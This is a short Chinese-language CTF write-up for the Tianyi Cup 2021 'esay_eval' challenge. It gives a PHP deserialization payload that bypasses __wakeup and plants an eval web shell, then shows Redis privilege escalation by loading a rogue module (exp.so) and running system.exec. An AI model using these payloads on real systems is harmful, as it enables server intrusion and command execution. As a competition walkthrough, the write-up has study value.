![[天翼杯 2021]esay_eval--REDIS](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/06/14/20220615045604538.jpg)
代码pop链子构造不难,问题是反序列化要绕过wakeup,正常就是改数字,但是这里有个正则过滤
注意匹配的是大写字母,而类的名称大小写即可,于是可以绕过![[天翼杯 2021]esay_eval--REDIS](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/06/14/20220615045606653.jpg)
反序列化传入一个一句话代码,蚁剑连接
![[天翼杯 2021]esay_eval--REDIS](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/06/14/20220615045607420.jpg)
?poc=O:1:%22b%22:2:{s:1:%22a%22;O:1:%22a%22:1:{s:4:%22code%22;s:16:%22eval($_POST[1]);%22;}}
发现有文件
![[天翼杯 2021]esay_eval--REDIS](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/06/14/20220615045608220.jpg)
下载打开
![[天翼杯 2021]esay_eval--REDIS](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/06/14/20220615045610207.jpg)
发现Redis密码,猜测是Redis提权
用蚁剑连接Redis
蚁剑Redis插件地址: https://github.com/Medicean/AS_Redis
![[天翼杯 2021]esay_eval--REDIS](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/06/14/20220615045611383.jpg)
![[天翼杯 2021]esay_eval--REDIS](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/06/14/20220615045611630.jpg)
先在有权限的目录上传一个exp.so文件
文件地址:https://github.com/Dliv3/redis-rogue-server
![[天翼杯 2021]esay_eval--REDIS](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/06/14/20220615045612974.jpg)
在Redis命令行执行
MODULE LOAD /var/www/html/exp.so
system.exec "命令"
![[天翼杯 2021]esay_eval--REDIS](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/06/14/20220615045613801.jpg)
提权成功
原创文章,作者:kirin,如若转载,请注明出处:https://blog.ytso.com/267359.html